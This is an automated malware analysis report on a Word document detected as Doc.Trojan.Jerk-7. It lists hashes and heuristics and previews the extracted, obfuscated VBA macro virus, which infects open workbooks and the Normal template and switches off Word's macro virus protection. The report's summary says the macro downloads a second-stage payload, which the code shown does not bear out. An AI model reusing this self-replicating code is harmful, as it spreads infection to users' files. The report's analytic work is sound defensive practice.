Office (OLE) malware analysis — malicious · 230784e1913f7a84

MALICIOUS

Office (OLE)

42.0 KB Created: 1999-02-20 21:16:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: f6fdd11576008f36c9e5ae0fdf89fdb8 SHA-1: 2864bc0cdd2773ef8ddd4c661fcb931d2752f319 SHA-256: 230784e1913f7a842e4912287d2bfe4387d17d08c4bc9836e26e3a9e08bfdc64

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document with a high-severity heuristic indicating the presence of VBA macros. The extracted VBA code attempts to inject itself into other workbooks using the GetObject function, a known technique for obfuscation and payload delivery. The macro's intent appears to be downloading and executing a second-stage payload, although the specific URL or payload is not directly visible in the provided script excerpt. The ClamAV detection further supports its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Jerk-7 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Jerk-7
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
GetObject call high OLE_VBA_GETOBJ

GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28832 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28832 bytes
SHA-256: `a0f5621b44aef2519f4f2cf53382dc4c1602e19f53a6a295fb9faa2d561c8218`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Workbook_Deactivate() On Error Resume Next Const GMQATL = 1, ZCZLQJQHTMKY = True, DAOGHJCAC = False, OYUUUTFBKVJTCOC = 0 Dim EEQRPDG, NMOSYIAVKTPWLM As String Dim UXYIMEIWANP, GNXRKJLB As Integer Dim OGZXTPHIPQQ As Boolean NMOSYIAVKTPWLM = "ThisWorkbook" EEQRPDG = Application.ThisWorkbook.VBProject.VBComponents.Item(GMQATL).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(GMQATL).CodeModule.CountOfLines) Call NLOYDEC(EEQRPDG) For UXYIMEIWANP = GMQATL To Application.Workbooks.Count OGZXTPHIPQQ = DAOGHJCAC For GNXRKJLB = GMQATL To Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Count If Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).CodeModule.CountOfLines = OYUUUTFBKVJTCOC Then If Application.Workbooks.Item(UXYIMEIWANP).Path <> "" And Application.Workbooks.Item(UXYIMEIWANP).Saved = ZCZLQJQHTMKY And OGZXTPHIPQQ = DAOGHJCAC Then OGZXTPHIPQQ = ZCZLQJQHTMKY Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).CodeModule.InsertLines GMQATL, EEQRPDG If Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).Name = NMOSYIAVKTPWLM Then Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).CodeModule.ReplaceLine GMQATL * 33, "Private Sub Workbook_Deactivate()" Else Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).CodeModule.ReplaceLine GMQATL * 33, "Private Sub Worksheet_Deactivate()" End If End If Next GNXRKJLB If OGZXTPHIPQQ = ZCZLQJQHTMKY Then Application.Workbooks.Item(UXYIMEIWANP).Save Next UXYIMEIWANP End Sub Private Sub Document_Close() On Error Resume Next Const ZCZLQJQHTMKY = True, DAOGHJCAC = False, OYUUUTFBKVJTCOC = 0, GMQATL = 1, XZHDC = wdFormatDocument, FYADBWHMSYHYX = wdFormatTemplate, ZHFRIMGWHH = ":" Dim OGZXTPHIPQQ, VEJWDG, OOWJIBBZ, MJODT As Boolean Dim OZBWWGT, VQAQBVFHUQ As Object Dim FDJMUHIQSWTATK, EEQRPDG As String Set OZBWWGT = ActiveDocument.VBProject.VBComponents.Item(GMQATL) Set VQAQBVFHUQ = NormalTemplate.VBProject.VBComponents.Item(GMQATL) Randomize OOWJIBBZ = DAOGHJCAC MJODT = DAOGHJCAC If OZBWWGT.CodeModule.CountOfLines <> OYUUUTFBKVJTCOC Then OOWJIBBZ = ZCZLQJQHTMKY If VQAQBVFHUQ.CodeModule.CountOfLines <> OYUUUTFBKVJTCOC Then MJODT = ZCZLQJQHTMKY Options.VirusProtection = DAOGHJCAC If (OOWJIBBZ = ZCZLQJQHTMKY Xor MJODT = ZCZLQJQHTMKY) And (ActiveDocument.SaveFormat = XZHDC Or ActiveDocument.SaveFormat = FYADBWHMSYHYX) Then If OOWJIBBZ = ZCZLQJQHTMKY Then VEJWDG = NormalTemplate.Saved EEQRPDG = OZBWWGT.CodeModule.Lines(GMQATL, OZBWWGT.CodeModule.CountOfLines) Call JJPGKBNVXZNSCME(EEQRPDG) If Int(Rnd * 10 * GMQATL) = GMQATL * 7 Then Call YPQVPZNASUFFVS(EEQRPDG) Call FKDJUVTV(EEQRPDG) VQAQBVFHUQ.CodeModule.InsertLines GMQATL, EEQRPDG If VEJWDG = ZCZLQJQHTMKY Then NormalTemplate.Save End If FDJMUHIQSWTATK = Mid(ActiveDocument.FullName, 2, GMQATL) If MJODT = ZCZLQJQHTMKY And (FDJMUHIQSWTATK = ZHFRIMGWHH Or ActiveDocument.Saved = DAOGHJCAC) Then OGZXTPHIPQQ = ActiveDocument.Saved EEQRPDG = VQAQBVFHUQ.CodeModule.Lines(GMQATL, VQAQBVFHUQ.CodeModule.CountOfLines) Call FKDJUVTV(EEQRPDG) OZBWWGT.CodeModule.InsertLines GMQATL, EEQRPDG If OGZXTPHIPQQ = ZCZLQJQHTMKY Then ActiveDocument.Save End If End If End Sub Private Sub YPQVPZNASUFFVS(ByRef EEQRPDG As String) On Error Resume Next Const QIFRBCAZYANQS = 48, PAJIPWJXOHR = 15, TANEYWDERUD = 5, JOVHDK = 65, QJCZV = 90, GMQATL = 1, ZCZLQJQHTMKY = True, DAOGHJCAC = False Dim KNPDNRGGCNVE, MQLWPEJIQGYUATmp, QOIJHY, MQLWPEJIQGYUA(GMQATL To QIFRBCAZYANQS), MQLWPEJIQGYUA2(GMQATL To QIFRBCAZYANQS) As String Dim UXYIMEIWANP, GNXRKJLB, UWZPCBHDLHWS As Integer Dim HDUMVDDNOOD As Boolean KNPDNRGGCNVE = "EEQRPDG QIFRBCAZYANQS ... (truncated)

SHA-256: a0f5621b44aef2519f4f2cf53382dc4c1602e19f53a6a295fb9faa2d561c8218

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
































Private Sub Workbook_Deactivate()
On Error Resume Next
Const GMQATL = 1, ZCZLQJQHTMKY = True, DAOGHJCAC = False, OYUUUTFBKVJTCOC = 0
Dim EEQRPDG, NMOSYIAVKTPWLM As String
Dim UXYIMEIWANP, GNXRKJLB As Integer
Dim OGZXTPHIPQQ As Boolean
NMOSYIAVKTPWLM = "ThisWorkbook"
EEQRPDG = Application.ThisWorkbook.VBProject.VBComponents.Item(GMQATL).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(GMQATL).CodeModule.CountOfLines)
Call NLOYDEC(EEQRPDG)
For UXYIMEIWANP = GMQATL To Application.Workbooks.Count
OGZXTPHIPQQ = DAOGHJCAC
For GNXRKJLB = GMQATL To Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Count
If Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).CodeModule.CountOfLines = OYUUUTFBKVJTCOC Then
If Application.Workbooks.Item(UXYIMEIWANP).Path <> "" And Application.Workbooks.Item(UXYIMEIWANP).Saved = ZCZLQJQHTMKY And OGZXTPHIPQQ = DAOGHJCAC Then OGZXTPHIPQQ = ZCZLQJQHTMKY
Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).CodeModule.InsertLines GMQATL, EEQRPDG
If Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).Name = NMOSYIAVKTPWLM Then
Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).CodeModule.ReplaceLine GMQATL * 33, "Private Sub Workbook_Deactivate()"
Else
Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).CodeModule.ReplaceLine GMQATL * 33, "Private Sub Worksheet_Deactivate()"
End If
End If
Next GNXRKJLB
If OGZXTPHIPQQ = ZCZLQJQHTMKY Then Application.Workbooks.Item(UXYIMEIWANP).Save
Next UXYIMEIWANP
End Sub
Private Sub Document_Close()
On Error Resume Next
Const ZCZLQJQHTMKY = True, DAOGHJCAC = False, OYUUUTFBKVJTCOC = 0, GMQATL = 1, XZHDC = wdFormatDocument, FYADBWHMSYHYX = wdFormatTemplate, ZHFRIMGWHH = ":"
Dim OGZXTPHIPQQ, VEJWDG, OOWJIBBZ, MJODT As Boolean
Dim OZBWWGT, VQAQBVFHUQ As Object
Dim FDJMUHIQSWTATK, EEQRPDG As String
Set OZBWWGT = ActiveDocument.VBProject.VBComponents.Item(GMQATL)
Set VQAQBVFHUQ = NormalTemplate.VBProject.VBComponents.Item(GMQATL)
Randomize
OOWJIBBZ = DAOGHJCAC
MJODT = DAOGHJCAC
If OZBWWGT.CodeModule.CountOfLines <> OYUUUTFBKVJTCOC Then OOWJIBBZ = ZCZLQJQHTMKY
If VQAQBVFHUQ.CodeModule.CountOfLines <> OYUUUTFBKVJTCOC Then MJODT = ZCZLQJQHTMKY
Options.VirusProtection = DAOGHJCAC
If (OOWJIBBZ = ZCZLQJQHTMKY Xor MJODT = ZCZLQJQHTMKY) And (ActiveDocument.SaveFormat = XZHDC Or ActiveDocument.SaveFormat = FYADBWHMSYHYX) Then
If OOWJIBBZ = ZCZLQJQHTMKY Then
VEJWDG = NormalTemplate.Saved
EEQRPDG = OZBWWGT.CodeModule.Lines(GMQATL, OZBWWGT.CodeModule.CountOfLines)
Call JJPGKBNVXZNSCME(EEQRPDG)
If Int(Rnd * 10 * GMQATL) = GMQATL * 7 Then Call YPQVPZNASUFFVS(EEQRPDG)
Call FKDJUVTV(EEQRPDG)
VQAQBVFHUQ.CodeModule.InsertLines GMQATL, EEQRPDG
If VEJWDG = ZCZLQJQHTMKY Then NormalTemplate.Save
End If
FDJMUHIQSWTATK = Mid(ActiveDocument.FullName, 2, GMQATL)
If MJODT = ZCZLQJQHTMKY And (FDJMUHIQSWTATK = ZHFRIMGWHH Or ActiveDocument.Saved = DAOGHJCAC) Then
OGZXTPHIPQQ = ActiveDocument.Saved
EEQRPDG = VQAQBVFHUQ.CodeModule.Lines(GMQATL, VQAQBVFHUQ.CodeModule.CountOfLines)
Call FKDJUVTV(EEQRPDG)
OZBWWGT.CodeModule.InsertLines GMQATL, EEQRPDG
If OGZXTPHIPQQ = ZCZLQJQHTMKY Then ActiveDocument.Save
End If
End If
End Sub
Private Sub YPQVPZNASUFFVS(ByRef EEQRPDG As String)
On Error Resume Next
Const QIFRBCAZYANQS = 48, PAJIPWJXOHR = 15, TANEYWDERUD = 5, JOVHDK = 65, QJCZV = 90, GMQATL = 1, ZCZLQJQHTMKY = True, DAOGHJCAC = False
Dim KNPDNRGGCNVE, MQLWPEJIQGYUATmp, QOIJHY, MQLWPEJIQGYUA(GMQATL To QIFRBCAZYANQS), MQLWPEJIQGYUA2(GMQATL To QIFRBCAZYANQS) As String
Dim UXYIMEIWANP, GNXRKJLB, UWZPCBHDLHWS As Integer
Dim HDUMVDDNOOD As Boolean
KNPDNRGGCNVE = "EEQRPDG QIFRBCAZYANQS 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.